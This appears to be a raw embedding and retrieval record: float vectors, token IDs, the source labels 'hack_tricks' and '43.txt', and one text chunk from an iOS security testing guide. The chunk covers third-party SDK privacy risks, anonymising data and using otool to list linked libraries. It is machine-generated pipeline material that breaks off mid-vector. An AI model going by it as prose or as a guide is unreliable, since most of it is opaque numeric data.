-0.009497013874351978, 0.07282153517007828, -0.5497135519981384, -0.2779349386692047, 0.1686933934688568, 0.18193428218364716, 0.025767868384718895, -0.7408681511878967, 0.6477159857749939, -0.7218496799468994, -0.8545266389846802, -0.2322664111852646, -0.23323757946491241, -0.651076078414917, -0.2961644232273102, -0.4338020384311676, 0.25580981373786926, -0.9769997596740723, 0.49684515595436096, -0.7997300028800964, -0.07923296838998795, -0.20154371857643127, -0.9789937734603882, 0.3399847745895386, 0.5927551984786987, -0.4733908474445343, 0.5088518857955933, 0.044901225715875626, 0.024997549131512642, 0.07581732422113419, -0.6868513226509094, 0.6664784550666809, 0.018189867958426476, 0.03337906673550606, 0.21361029148101807, 0.1252366006374359, 0.0898028016090393, 0.5135980248451233, -0.0583035871386528, -0.5357310771942139, 0.2557510733604431, -0.33007553219795227, -0.11708860844373703, -0.2140192687511444, -0.33378759026527405, 0.32867249846458435, 0.6070690751075745, 0.371711790561676, 0.049542732536792755, -0.06783806532621384, 0.7792330384254456, 0.47140660881996155, 0.3973383903503418, 0.5027308464050293, 0.2483799308538437, -0.2291746288537979, -0.4758046269416809, -0.362557590007782, 0.23953396081924438, -0.1833321750164032, 0.3245035409927368, 0.03680497407913208, 0.1834188550710678, -0.4285273849964142, -0.17957207560539246, -0.18091535568237305, 0.22682006657123566, 0.577919065952301, 0.30665767192840576, -0.10879696160554886, 0.5007656216621399, -1.0245052576065063, -0.342387318611145, -0.7783151865005493, -0.1570071280002594, 0.14503726363182068, -0.09434299170970917, -0.454129695892334, -0.5614511966705322, 0.41750475764274597, 0.20944784581661224, -0.18601268529891968, -0.414998322725296, 0.22176991403102875, -0.1747559756040573, 0.23816782236099243, 0.687710702419281, -0.21350860595703125, -0.144011452794075, -0.4014556407928467, 0.5325435996055603, -0.21942125260829926, -0.5099683403968811, 0.6631646156311035, 0.9954639077186584, -0.09759732335805893, -0.4066135287284851, -0.7763599157333374, 0.38116922974586487, -0.011624133214354515, 0.16978122293949127, 0.12327959388494492, 0.7209838032722473, -0.786856472492218, 0.8065733909606934, -0.7758288979530334, 0.5407956838607788, -0.4839198887348175, -0.211419016122818, 0.1010420173406601, -0.022598907351493835, -0.3033249080181122, 0.43391168117523193, -0.16617858409881592, -0.25617265701293945, 0.5131430625915527, 0.2625499665737152, 0.5730870366096497, -0.3134005665779114, 0.04827917367219925, -0.45345035195350647, 0.5595412254333496, 0.5317786931991577, 0.2594718933105469, -0.4258258044719696, 0.5603386163711548, 0.1888888031244278, -0.2361413538455963, 0.04973581060767174, 0.3194452226161957, -0.060967110097408295, -0.41043025255203247, -0.4630149304866791, -0.7941839694976807, -0.15001992881298065, -0.14670929312705994, -0.8271934390068054, 0.1478935182094574, -0.20748455822467804, 0.3942391276359558, 0.07034730166196823, -0.5175674557685852, 0.6063007712364197, -0.8278847932815552, 0.7805939316749573, 0.163555309176445, -0.36110419034957886, 0.5667891502380371, -0.13794302940368652, -0.4152318835258484, -0.20299014449119568, 0.726767897605896, 0.2934485375881195, 0.09845702350139618, 0.4620110094547272, -0.024178704246878624, -0.005178550258278847, 0.4018290340900421, -0.43699100613594055, -0.9514340758323669, 0.012163778766989708, 0.0298935417085886, -0.4322652518749237, -0.6203353404998779, -0.04762088879942894, 0.12796971201896667, -0.7705351114273071, 0.5708635449409485, -0.44524669647216797, 0.5903110504150391, -0.36894068121910095, -0.0765073373913765, -0.0055218227207660675, -0.41003870964050293, 0.3565351366996765, -0.8060038089752197, -0.8642700910568237, 0.7469214200973511, 0.3396848738193512, 0.17413976788520813, -0.2737983167171478, 0.5363389253616333, 0.08528824895620346, 0.3043568730354309, -0.02547813393175602, -0.2168746441602707, 0.2894850969314575, -0.11224500834941864, -0.11171901226043701, -0.47398608922958374, -0.10282351076602936, -0.7429689168930054, 0.7787256836891174, 0.36268576979637146, -0.7737472057342529, -0.3166295886039734, 0.3135311007499695, -0.3382857143878937, -0.33346185088157654, 0.28903836011886597, -0.23498694598674774, -0.41285043954849243, -0.18244445323944092, 0.15167587995529175, -0.15191219747066498, 0.2681898772716522, -0.35488852858543396, -0.6473050713539124, -0.08372842520475388, 0.23002368211746216, -0.09762384742498398, 0.4505890905857086, -0.38712719082832336, -0.23395134508609772, 0.15756627917289734, -0.3025604784488678, -0.9734499454498291, 0.2834150195121765, -0.3424736559391022, -0.08374710381031036, 0.7074479460716248, 0.1210368424654007, 0.4846288859844208, 0.7186743021011353, 0.3521905541419983, -0.46841466426849365, 0.18093009293079376, 0.3392670750617981, -0.26198506355285645, 0.4809210002422333, 0.001863778568804264, -0.00990210473537445, 0.38146376609802246, -0.2532966434955597, 0.798355221748352, -0.26089397072792053, -0.5192795991897583, -0.4271775782108307, -0.020685112103819847, -0.9385437369346619, -0.47152164578437805, 0.04134197533130646, 0.16101141273975372, 0.6161020398139954, 0.053110670298337936, -0.6289353370666504, 0.027903886511921883, -0.8294147253036499, 0.3757270574569702, -0.08303595334291458, -0.05549987405538559, 0.0004920127685181797, -0.5543947815895081, 0.6523322463035583, -1.2740334272384644, 4.560298442840576, 0.3880282938480377, -0.23237159848213196, -0.08477013558149338, 0.6309287548065186, 0.3679141700267792, 0.482194721698761, -0.5912588238716125, 0.06158502772450447, -0.08767805248498917, -0.20194944739341736, -0.9830643534660339, 0.7848488092422485, 0.36141565442085266, 0.14539185166358948, 0.27285805344581604, -0.3497830629348755, 0.21238532662391663, 0.14956456422805786, -0.9318586587905884, -0.9279014468193054, 0.39189770817756653, -0.21758633852005005, 0.9342528581619263, 0.15362045168876648, 0.10281948745250702, -0.03628179803490639, -0.16655975580215454, -0.20956672728061676, -0.05110595375299454, 0.35754016041755676, -0.1426362842321396, 0.39493328332901, -0.8963087797164917, -0.6611701250076294, 0.5410296320915222, -0.20340003073215485, -0.247335284948349, -0.25108158588409424, 0.3279697895050049, 0.17489734292030334, -0.32708612084388733, -0.085205078125, -0.23600420355796814, 0.22603507339954376, 0.5985643267631531, -0.35686784982681274, 0.7927424311637878, 1.005974292755127, -0.478009432554245, 0.5864341855049133, -0.22587823867797852, 0.6265827417373657, -0.11602240055799484, -0.8433791995048523, 0.010141662321984768, 0.2126738280057907, -0.13364899158477783, 0.0704280361533165, -0.10613313317298889, 0.4271288514137268, -0.05925896018743515, -0.0242843646556139, -0.4715891182422638, -0.5054773092269897, 0.48881474137306213, -0.30971282720565796, 0.7079073190689087, 0.05681806430220604, -0.0832487940788269, -0.6892502903938293, -0.13011257350444794, -0.40499651432037354, -0.7343141436576843, 0.729602038860321, -0.18821409344673157, 0.06497732549905777, 0.4281657338142395, 0.6146205067634583, -0.36674997210502625, -0.25444313883781433, -0.1374826580286026, -0.5217666625976562, 0.6899183392524719, 0.8632866740226746, 0.6366673707962036, -0.22879742085933685, -1.053186297416687, 0.20718954503536224, 0.5897918939590454, 0.6881923675537109, -0.06410732120275497, 0.14101280272006989, -0.079119011759758, 0.08860185742378235 ]
[ 2478, 20934, 14536, 1010, 2044, 19836, 20934, 14536, 6187, 1999, 1996, 18059, 1010, 2017, 2064, 3443, 1037, 2047, 8196, 2007, 20934, 14536, 2005, 1037, 2367, 3677, 18442, 1998, 2224, 2009, 1012, 2065, 1996, 4646, 2145, 2573, 1010, 2059, 1010, 2242, 2009, 1005, 1055, 8211, 1012, 8196, 22866, 10128, 2019, 4646, 2003, 11178, 2478, 7020, 2140, 22866, 1010, 2059, 1996, 4646, 2097, 2069, 2573, 2065, 1996, 8196, 2003, 1996, 2320, 3517, 2000, 2022, 1012, 2043, 5604, 2019, 4646, 2023, 2453, 2022, 1037, 3291, 2004, 20934, 14536, 2097, 3710, 2009, 1005, 1055, 2219, 8196, 1012, 1999, 2344, 2000, 11826, 2023, 3860, 2503, 1037, 7173, 29162, 5080, 1010, 2017, 2064, 16500, 1996, 4646, 7020, 2140, 3102, 6942, 2030, 16500, 20934, 14536, 4684, 3353, 29337, 2064, 2036, 2224, 22224, 1005, 1055, 16380, 7020, 14277, 23111, 2075, 4487, 19150, 15630, 15459, 1013, 2291, 1013, 3075, 2017, 2064, 2424, 1996, 7705, 2015, 5361, 1999, 1996, 3042, 2109, 2011, 2291, 5097, 10760, 5097, 5361, 2011, 1996, 5310, 2013, 1996, 10439, 3573, 2024, 2284, 2503, 1013, 5310, 1013, 5097, 5685, 1996, 1013, 5310, 1013, 3075, 3397, 2951, 5552, 2011, 1996, 5310, 2504, 5097, 29337, 2064, 3229, 1013, 5310, 1013, 3075, 1013, 3964, 1013, 3964, 1012, 29296, 4221, 2000, 3191, 1996, 3964, 5552, 2503, 1996, 4646, 1012, 2503, 1996, 19622, 1997, 2019, 5361, 4646, 1006, 1013, 5310, 1013, 5097, 1013, 1026, 10439, 8909, 1028, 1013, 1007, 2017, 2064, 2424, 2070, 5875, 6764, 1024, 11943, 8445, 6198, 1024, 1996, 12696, 2109, 2011, 1996, 10439, 4183, 26639, 11368, 8447, 2696, 1012, 20228, 2923, 1024, 18558, 1997, 1996, 10439, 2109, 1999, 1996, 10439, 3573, 1013, 3075, 1013, 1008, 1024, 3397, 1996, 18394, 1998, 17053, 1012, 1999, 1013, 3075, 1013, 17053, 1013, 20057, 12326, 2015, 1013, 1008, 2017, 2064, 2424, 1996, 20057, 12326, 2864, 2000, 1996, 4646, 2077, 6016, 2009, 2000, 1996, 4281, 1012, 2980, 8983, 2075, 1013, 16348, 10651, 2075, 10760, 9797, 2064, 19512, 8983, 2035, 14111, 1997, 2037, 10439, 6880, 2302, 2383, 2000, 24501, 12083, 22930, 1996, 4646, 2000, 1996, 10439, 3573, 1998, 3524, 2127, 2009, 1005, 1055, 4844, 1012, 2005, 2023, 3800, 2009, 1005, 1055, 2788, 2224, 1046, 13102, 4017, 2818, 1012, 2021, 2045, 2024, 2060, 7047, 2036, 2107, 2004, 19558, 1998, 10509, 1011, 3128, 1011, 18726, 19277, 1011, 2544, 1011, 4638, 2121, 1012, 2023, 2003, 1037, 4795, 7337, 2008, 2071, 2022, 16999, 2011, 24391, 2353, 2283, 17371, 5705, 3568, 2009, 1005, 1055, 6749, 2000, 4638, 2029, 4118, 2003, 2109, 2000, 6882, 2039, 16616, 1006, 2065, 2151, 1007, 1998, 3231, 2009, 1012, 2017, 2071, 3046, 2000, 8816, 1037, 3025, 2544, 1997, 1996, 10439, 2005, 2023, 3800, 1012, 2353, 4243, 5643, 3291, 1997, 3822, 2283, 17371, 5705, 2003, 2008, 2045, 2003, 2053, 12604, 7934, 2491, 2058, 1996, 2838, 3253, 2011, 1996, 17371, 2243, 1012, 2017, 2071, 9790, 1996, 17371, 2243, 1998, 2031, 2035, 2838, 1006, 2164, 16474, 29324, 1998, 16021, 29150, 8299, 7264, 1007, 1010, 2030, 2025, 2224, 2009, 1012, 2036, 1010, 2788, 2009, 1005, 1055, 2053, 2825, 2005, 1996, 5097, 9797, 2000, 8983, 1037, 18130, 2006, 1996, 17371, 2243, 1012, 9308, 2070, 17371, 5705, 2707, 4820, 15451, 8059, 2320, 2027, 2024, 2200 ]
hack_tricks
43.txt
26
trusted by the community. besides, the features these services provide can involve tracking services to monitor the user's behaviour while using the app, selling banner advertisements, or improving the user experience. the downside to third - party services is that developers don't know the details of the code executed via third - party libraries. consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed. the downside is that a developer doesn ’ t know in detail what code is executed via 3rd party libraries and therefore giving up visibility. consequently it should be ensured that not more than the information needed is sent to the service and that no sensitive information is disclosed. most third - party services are implemented in two ways : with a standalone librarywith a full sdkall data that's sent to third - party services should be anonymized to prevent exposure of pii ( personal identifiable information ) that would allow the third party to identify the user account. you can find the libraries used by an application by running otool against the app ( and running it against each shared library to find more shared libraries used ). [SEP]
[ 0.07566327601671219, -0.16187649965286255, -0.4479755163192749, -0.33325615525245667, -0.03082503005862236, -0.2718595862388611, -0.10720503330230713, -0.17882147431373596, 0.3948768675327301, 0.4186302423477173, -0.4172198176383972, -0.0803922638297081, 0.23706567287445068, -0.43519750237464905, -0.6906309127807617, 0.06855982542037964, -0.14063388109207153, 0.7235420346260071, -0.3796612024307251, -0.3147065043449402, 0.6335980892181396, 0.6524814367294312, -0.47721728682518005, -0.25413498282432556, -0.36063694953918457, 0.43116918206214905, 0.5092869400978088, -0.33957764506340027, 0.829221785068512, 0.7910080552101135, -0.2039758712053299, 0.2503111958503723, 0.41715654730796814, -0.42914798855781555, 0.44360828399658203, -0.11523329466581345, 0.8915425539016724, -0.781208336353302, 0.011872968636453152, -0.5981913208961487, 0.21917098760604858, 0.06919702887535095, 0.4228161573410034, -1.2222497463226318, -0.5794053673744202, 0.33825796842575073, -0.18796506524085999, -0.2139900177717209, -0.19851261377334595, 0.04662816971540451, -0.20538902282714844, 0.3889249265193939, -0.147340789437294, -0.5261725187301636, -0.007901117205619812, -0.11627836525440216, 0.29852041602134705, -0.499848335981369, -0.33928555250167847, 0.7371994256973267, -0.2664790451526642, 0.11077942699193954, -0.09423815459012985, -1.1756510734558105, 0.6637766361236572, 0.38674014806747437, -0.34044787287712097, -0.4254336655139923, 0.5545410513877869, -0.407636821269989, 0.028499748557806015, -0.010111379437148571, -0.5526222586631775, -0.5275356769561768, -0.19735702872276306, 0.011797909624874592, -0.11819858849048615, 0.22720801830291748, 0.4861827790737152, 0.9360095858573914, 0.3550184369087219, 0.6629502177238464, -0.4489373564720154, -0.3745996952056885, -0.6118102669715881, -0.4698777198791504, 0.5856438279151917, -0.5390036702156067, 0.013064735569059849, -0.14768390357494354, -0.19213148951530457, 0.37816473841667175, -0.4852449595928192, 0.3120969831943512, 0.39305227994918823, 0.021545661613345146, -0.7071396708488464, 0.46532562375068665, 0.1330232173204422, 0.1786133199930191, 1.1987496614456177, -0.2832503020763397, -0.1671830415725708, 0.38468295335769653, -0.040921855717897415, 0.947300374507904, 0.7523802518844604, -0.24506555497646332, -0.5195466876029968, -0.6091054081916809, -0.1133057177066803, -0.3478230834007263, 0.04842430725693703, -0.6113991737365723, -0.4603796601295471, 0.2624174952507019, 0.14209644496440887, 0.18628066778182983, 0.028886063024401665, 0.17171376943588257, 0.4542340636253357, -0.3103697597980499, 0.47496911883354187, -0.2625456750392914, 0.7099710702896118, 0.09166891127824783, 0.14815883338451385, 0.9199498295783997, -1.265175461769104, -0.4447881877422333, -0.11546450108289719, -0.3173195719718933, 0.3872660994529724, 0.3732798993587494, -0.31684353947639465, 0.09899760037660599, 0.7717339396476746, 0.06459268927574158, 0.42272618412971497, -0.6049990653991699, -0.3332644999027252, 0.32823240756988525, 0.06947104632854462, 1.7156723737716675, 0.14211542904376984, 0.21970143914222717, -0.04033117741346359, 0.39298778772354126, -0.20210325717926025, 0.07623740285634995, -0.3364229202270508, 0.3763015866279602, 0.9528773427009583, -0.030567936599254608, 0.20098039507865906, -0.2848656177520752, -0.6458746194839478, -0.1994832158088684, 0.6078890562057495, 0.07093772292137146, -0.2029699981212616, 0.33904770016670227, -0.03866592049598694, 0.825079619884491, 0.021839674562215805, 0.5834662914276123, -0.6571152210235596, -0.5610485076904297, 0.5080854892730713, 0.28728052973747253, 0.3972536027431488, 0.18936747312545776, -0.8312748074531555, 0.48326900601387024, 0.7841659784317017, -0.1627049446105957, 0.6631934642791748, -0.09550201147794724, 0.5327678322792053, 1.0889760255813599, 0.0117256511002779, 0.11078011244535446, 0.03356814384460449, 0.5858087539672852, 0.20938575267791748, 0.6802666783332825, 0.05223390832543373, -0.3915712535381317, -0.909938633441925, -0.3054046332836151, 0.08970431983470917, 0.1926068216562271, -0.627678394317627, 0.3153344988822937, -0.22546929121017456, -0.2617165744304657, -0.8216787576675415, 0.09935849159955978, 0.18909978866577148, -1.1573498249053955, -0.5684950351715088, -0.06561620533466339, -0.4304853081703186, 0.0720442458987236, -0.21954526007175446, 0.07980835437774658, 0.6203207969665527, 0.948718786239624, -0.14669208228588104, 0.20719148218631744, 0.8183280825614929, 0.24993157386779785, -1.3781543970108032, -0.8209941983222961, 0.33311671018600464, -0.2912346124649048, -0.20112502574920654, -0.06174591928720474, -0.11447836458683014, -0.035863686352968216, -0.4352554678916931, 0.08216769248247147, 0.0726127102971077, -0.3942245841026306, -0.8274288773536682, -0.13933385908603668, -0.08859488368034363, 0.6009266376495361, -0.40258362889289856, -0.3893624246120453, 0.3549988269805908, 0.7648383975028992, -0.2540318965911865, 1.071661353111267, 0.04142114147543907, 0.06904832273721695, 0.4082464277744293, 0.19410772621631622, -0.17888855934143066, 0.7092221975326538, 0.5063552260398865, 0.3893802762031555, 0.005019800271838903, 0.3471468687057495, 0.2581397294998169, 0.18579168617725372, 0.6662434935569763, 0.2766086757183075, -0.13375242054462433, 0.7317451238632202, -0.5248411893844604, 0.556884229183197, -0.08946385234594345, -0.026260793209075928, 0.0198594368994236, -0.07569874823093414, 0.5750612020492554, 0.7320632338523865, -0.2926921248435974, -0.5772552490234375, 0.2857999801635742, 0.9977147579193115, 0.6217203736305237, -0.701245129108429, 0.3340356647968292, 0.17867253720760345, 0.9210633039474487, -0.06468594819307327, -0.7300811409950256, -0.39159899950027466, -1.2142605781555176, -0.1344822198152542, -0.32537373900413513, -0.3212575614452362, -1.094339370727539, -0.6552707552909851, 0.2811836898326874, -0.8449515104293823, 0.1910271793603897, -0.156647726893425, -0.1435876488685608, -0.015562302432954311, 0.5594726800918579, 0.14881590008735657, -0.06195876747369766, 0.39223527908325195, -0.6264449954032898, 0.533637523651123, -0.18514013290405273, 0.375871479511261, 0.35409295558929443, 0.5141605138778687, -0.1928679496049881, -0.38262468576431274, 0.8693342208862305, -0.44898244738578796, 0.04215583950281143, 0.2283196747303009, -1.5577449798583984, 0.2970713675022125, -0.18690544366836548, 0.11713635921478271, -0.3222275674343109, 0.4402715861797333, -0.19076822698116302, 0.35735031962394714, 0.030316460877656937, 0.15102343261241913, 0.33035287261009216, 0.26516661047935486, -0.14311213791370392, 0.2441531866788864, -0.0008889049058780074, -1.1796549558639526, -0.6732982993125916, 0.7695660591125488, 0.35693517327308655, 0.17489206790924072, 0.34090322256088257, 0.23404940962791443, -0.12386153638362885, -0.34998124837875366, -0.31607481837272644, -0.42423751950263977, 0.18766769766807556, 0.21759508550167084, -0.19995847344398499, -1.1200134754180908, -0.07044272124767303, -0.281786173582077, -0.15154612064361572, -0.5639488697052002, -0.25274741649627686, 0.009654214605689049, 0.022847210988402367, 0.21136480569839478, -0.1596701592206955, -0.5317398905754089, 0.23584119975566864, 0.22609561681747437, -0.6352189183235168, -0.5735595226287842, 0.24433033168315887, 0.510758101940155, 0.26593559980392456, 0.15159016847610474, -0.3374343812465668, -0.4961804747581482, 0.10674332082271576, -1.098526954650879, 0.37035688757896423, 0.4460904598236084, -0.39669832587242126, 0.38596805930137634, 0.35007888078689575, 1.3902491331100464, -0.7911790609359741, -0.39576613903045654, -0.09929850697517395, 0.00051639333833009, 0.468385249376297, 0.1919468343257904, 0.051209453493356705, -0.2883743643760681, -0.49889642000198364, 0.00558201689273119, -0.3989276587963104, 0.47822752594947815, 1.405834436416626, -0.5769289135932922, 0.6776171326637268, -0.09136110544204712, -0.5655421018600464, 1.3021727800369263, -0.7979597449302673, -0.5881773829460144, 1.1856372356414795, 0.0052559408359229565, 0.8131824135780334, -0.18118765950202942, -0.4903741776943207, 0.29687437415122986, 0.06235770136117935, 0.43530580401420593, 0.1523396223783493, -0.1320246011018753, -1.0412729978561401, -0.11579853296279907, -0.6171371340751648, 0.22242574393749237, 0.5127009153366089, -0.016766101121902466, -0.4707243740558624, -0.3013838231563568, -0.19505995512008667, -0.5457068681716919, 0.02055233344435692, 0.790260910987854, 0.7404816746711731, 0.05434572696685791, -0.0160725899040699, 0.22781313955783844, -0.28145575523376465, 0.9140387177467346, -0.16585639119148254, -0.6677142977714539, 0.14150911569595337, 0.39465054869651794, -0.12728093564510345, 0.05548195540904999, -0.19622600078582764, -0.4810033440589905, -0.47898831963539124, 0.024037981405854225, 0.1322004646062851, 0.40840935707092285, -0.6268545985221863, -0.4973870813846588, 0.05619853734970093, -0.19791236519813538, -0.011376092210412025, -0.15004591643810272, -1.4460289478302002, 0.7516486644744873, 0.6407836079597473, 0.1320081651210785, -0.10027716308832169, 0.3761981725692749, 0.28289052844047546, 0.8881896734237671, -0.7413402199745178, -0.8926607966423035, -0.5307852029800415, -0.7953993678092957, -0.796172559261322, 0.7191557288169861, 0.7084349393844604, 0.0759296715259552, 0.5481228232383728, -0.8706080913543701, 0.3753446638584137, 0.628659188747406, -0.062191613018512726, -0.8313082456588745, -0.7812889218330383, -0.02960876375436783, 0.3949609696865082, -0.04557701200246811, 0.28100478649139404, 0.07516270875930786, 0.1561044603586197, -0.6496265530586243, 0.7766318917274475, -0.5398237109184265, 0.2690645158290863, -0.4423488676548004, 0.8556933999061584, -0.7182389497756958, 0.2730206251144409, 0.200906902551651, 0.6301199197769165, -0.10270465165376663, 0.4918851852416992, 0.061387307941913605, -0.6171333193778992, 0.5611931681632996, 0.024115821346640587, 0.23140567541122437, 0.033859122544527054, 0.6662620902061462, -0.22979547083377838, 0.26922357082366943, -0.4745827317237854, -0.19868040084838867, 0.20684920251369476, -0.6885485053062439, 0.09579680860042572, 0.42530179023742676, -0.27897316217422485, 0.2523566782474518, -0.5088427662849426, 0.3993440270423889, 0.48154616355895996, -0.21719156205654144, -1.0690354108810425, -0.7919487357139587, -0.7852054238319397, 0.13746413588523865, -0.13418525457382202, 0.8657408952713013, -0.20629563927650452, -0.5298957824707031, -0.017068874090909958, -0.7056058645248413, 0.12040270864963531, -0.6486543416976929, 0.08127626776695251, -0.3724026381969452, 0.7863567471504211, 0.1082996353507042, 0.6386187076568604, -0.4703580439090729, -0.4996706545352936, 0.2972225546836853, -0.29755550622940063, -0.11578632891178131, -0.10113182663917542, 0.07279211282730103, 0.6501433253288269, -0.8189482688903809, -0.3924521505832672, 0.7050554752349854, 0.000997031107544899, -0.4806627333164215, 0.7098125219345093, 0.20550745725631714, 0.3087458908557892, -0.16731677949428558, -0.9984449148178101, -0.08789190649986267, 0.7408769130706787, -0.3411313593387604, -0.4787491261959076, -0.3068407475948334, 0.37720608711242676, 0.3570171296596527, 0.41778692603111267, -0.9215263724327087, 0.04295428469777107, -0.5459343194961548, 0.5308855772018433, -0.2989308536052704, -0.08157070726156235, -0.4400828182697296, -0.3632780611515045, -0.06620223075151443, 0.7512475848197937, 0.10642607510089874, -0.49121400713920593, -0.47113171219825745, -0.046455249190330505, 0.3619711101055145, -0.3101433217525482, -0.23020459711551666, 0.1538359373807907, -0.33873316645622253, 0.5133807063102722, 1.1463286876678467, 0.9236969947814941, -0.45339927077293396, -1.159327745437622, 0.14052505791187286, 0.018416091799736023, -0.2417721152305603, -0.8906385898590088, -0.17721684277057648, -0.42377784848213196, 0.35323911905288696, 0.2820838987827301, 0.6681432127952576, -1.0024865865707397, 0.4843863546848297, -0.1365707963705063, -0.2048523873090744, -0.40632545948028564, 0.3076225519180298, -0.5296118855476379, -0.04103371500968933, 0.1182958111166954, -0.37453287839889526, 0.06482944637537003, -0.20457902550697327, 0.3740834891796112, -0.6880925893783569, -0.3632182776927948, 0.06950931251049042, 0.18422771990299225, -1.0531951189041138, -0.5093691349029541, -0.21511591970920563, -0.1226295530796051, -0.0700303316116333, 0.4262266457080841, -0.5341418981552124, 0.042090483009815216, -1.075291633605957, 0.37771767377853394, 0.6913358569145203, 0.8895733952522278, -0.03407645598053932, -0.10695531219244003, 0.3840608298778534, 0.5030941963195801, -0.24328874051570892, -0.3167271614074707, 0.03195235878229141, 0.041245367377996445, -0.6781977415084839, -0.06065216287970543, -0.737328052520752, -0.5311402082443237, 0.3760281503200531, 1.1113014221191406, -0.5087795257568359, -0.07919669151306152, 0.44173958897590637, -0.7856625318527222, -0.19613102078437805, 1.3755037784576416, -0.6537994146347046, 0.6610129475593567, 1.1532701253890991, 0.3577544689178467, -0.5396611094474792, 0.11679831147193909, -0.3850328028202057, 0.10603293776512146, -0.961647629737854, 0.6898366212844849, -0.6816532015800476, -0.8468099236488342, 0.22935520112514496, 0.3080708384513855, -0.45590710639953613, -0.2919537127017975, 0.061231374740600586, -0.09342308342456818, 0.10477382689714432, 0.11144840717315674, -0.16374681890010834, -0.2538522779941559, 0.29453638195991516, 0.06609582901000977, -0.5233858823776245, 0.1197853684425354, -0.14383095502853394, 0.4154520034790039, 0.21589651703834534, -0.006910214200615883, 0.6385477185249329, 0.8550840616226196, -0.08734094351530075, -0.40727537870407104, -1.1001605987548828, 0.5688650608062744, -0.5580706596374512, -0.32399874925613403, 0.48924946784973145, -0.0621756948530674, -0.23914530873298645, 0.07160486280918121, 0.2824259400367737, 0.8886451125144958, -0.9084944725036621, 0.21883362531661987, 0.6801377534866333, -0.6204453110694885, -0.5492919087409973, -0.14896894991397858, 0.6488673090934753, -0.6925436854362488, -0.3403618037700653, -0.2776666581630707, 0.997934103012085, 0.416925847530365, 0.5880908370018005, 0.09328393638134003, -0.27847954630851746, 0.5982339382171631, -0.33334487676620483, -0.17165866494178772, -0.5236985683441162, -0.6989129781723022, 0.1926223635673523, -0.5628525018692017, 0.0397990420460701, -0.5996407866477966, -0.550404965877533, 0.13065946102142334, -0.008411778137087822, 0.22725535929203033, -0.530175507068634, 0.16999545693397522, -0.7924814224243164, -1.141265869140625, -0.5398087501525879, 0.27378079295158386, -0.8710092902183533, -0.14931116998195648, -1.072938084602356, -0.17285703122615814, -0.6799827218055725, 0.21304260194301605, -0.6189578771591187, -0.0019119265489280224, -0.750302255153656, -0.32959437370300293, -0.3188514709472656, 0.45618298649787903, -0.5646647214889526, 0.5849858522415161, -0.21162135899066925, -0.34262025356292725, 0.551680326461792, -0.2452918142080307, -0.049760498106479645, 0.06411206722259521, -0.3574093282222748, -0.09440021216869354, 0.4872777760028839, 0.03585955128073692, 0.18445853888988495, 0.3890630900859833, -0.4272010028362274, 0.1996070295572281, -0.7123554944992065, -0.1861051768064499, 0.7463403344154358, 0.2512376308441162, 0.3191155195236206, 0.4255521297454834, 0.060478005558252335, 0.26158443093299866, 0.09887427091598511, 0.43517276644706726, 0.7518948912620544, 0.2914089262485504, 0.839150607585907, -0.4034988582134247, 0.09558748453855515, -0.10217718034982681, -0.08302828669548035, -0.17021921277046204, -0.025101250037550926, 0.3495456576347351, 0.3531266450881958, 0.2668193578720093, -0.99986732006073, -0.3907727301120758, -0.10668565332889557, 0.5267826318740845, 0.8129459619522095, 0.4554697871208191, 0.19792413711547852, -0.30912378430366516, 0.06522039324045181, -0.38043421506881714, -0.8627609014511108, -0.5392084121704102, 1.007707953453064, -0.13758200407028198, 0.4474617838859558, -0.3170333206653595, 0.099552683532238, 0.19222097098827362, 0.4005630910396576, 0.09247002005577087, 0.41393065452575684, 0.14568951725959778, -0.01271677203476429, 0.36693230271339417, -0.21468450129032135, -0.036000337451696396, -0.13190071284770966, 0.32991281151771545, -0.31834813952445984, -0.8178260922431946, 0.23109635710716248, 1.4471700191497803, -0.8837956786155701, -0.008865666575729847, -0.48350608348846436, -0.1694168895483017, 0.44258442521095276, 0.1912001669406891, 0.05836092680692673, -0.02433035708963871, -1.489419937133789, 0.7402139902114868, -0.3906542658805847, 1.024497628211975, -0.12716323137283325, 0.015121892094612122, -0.22484339773654938, 0.10074195265769958, -0.4003063440322876, 0.0018213125877082348, 0.21214286983013153, -0.12138214707374573, 0.12505236268043518, -0.2222479283809662, 0.4507383406162262, 0.2873929440975189, -0.33440351486206055, 0.5330807566642761, 0.40489286184310913, 0.25222381949424744, 0.3017786145210266, -0.5918324589729309, -0.10716966539621353, 0.3683854937553406, -0.07871029525995255, 0.1467404067516327, -0.5032466650009155, -0.5541290044784546, -0.22585450112819672, 0.047365736216306686, -0.17530831694602966, 0.4352067708969116, -0.02504662796854973, -0.5246092081069946, 0.05338078737258911, 0.047242339700460434, 0.383355051279068, -0.478657066822052, -0.07921268790960312, -0.011784357018768787, -0.548348605632782, -0.27041882276535034, -0.2857770025730133, -0.31412607431411743, 0.7881723046302795, 0.7958754897117615, -0.3268755078315735, -0.3095650374889374, 0.5250248312950134, 0.23873881995677948, -0.08791660517454147, 0.21320900321006775, -0.5229349732398987, -0.09823507070541382, 0.023085014894604683, 0.4921991527080536, -0.4316355884075165, -0.1357012242078781, 0.657218337059021, 0.22804610431194305, -0.1822195202112198, 0.023850349709391594, 0.1355743408203125, 0.17287805676460266, -0.04046832397580147, -0.6736449003219604, 0.1592695415019989, -0.8018115162849426, 0.27474236488342285, -0.3837657868862152, -0.17161129415035248, 0.9483647346496582, -0.9555103778839111, -1.169878363609314, 0.6467325091362, -0.18253713846206665, -0.146943137049675, 0.3969522714614868, 0.5414999723434448, -0.4326758086681366, 0.9640623331069946, 0.9280411601066589, -0.46059107780456543, 0.23536966741085052, 0.696108341217041, 0.44142189621925354, -0.17475256323814392, 0.2976466715335846, -0.23906172811985016, 0.6037830710411072, 0.5834478139877319, -0.5909917950630188, -0.43260815739631653, 0.5065562725067139, 0.2380063682794571, -0.3172110915184021, -0.4190121293067932, 0.09643271565437317, -0.6282815337181091, 0.4799518287181854, 0.24067413806915283, -0.09446411579847336, 0.05832255631685257, -0.657891571521759, 0.07371839135885239, -0.31099382042884827, -0.4182765483856201, -0.8029255270957947, 0.8664525747299194, -0.43169063329696655, -0.5663094520568848, 0.37420129776000977, -0.8060404658317566, -0.1525387018918991, -0.16674765944480896, -0.024662770330905914, -0.5864781737327576, 0.9477999210357666, 0.14049622416496277, 0.7890783548355103, 0.23387464880943298, -0.23806655406951904, 0.21271160244941711, 0.9024797081947327, 0.5370795726776123, -0.8762657642364502, 0.9931869506835938, 0.6352825164794922, -0.15030647814273834, 0.09868913143873215, -0.14290954172611237, -0.08806342631578445, -0.3886951208114624, -0.2833475172519684, 0.694517970085144, -0.3102462887763977, -1.031307339668274, -0.7941118478775024, -1.0200213193893433, 0.9717907905578613, 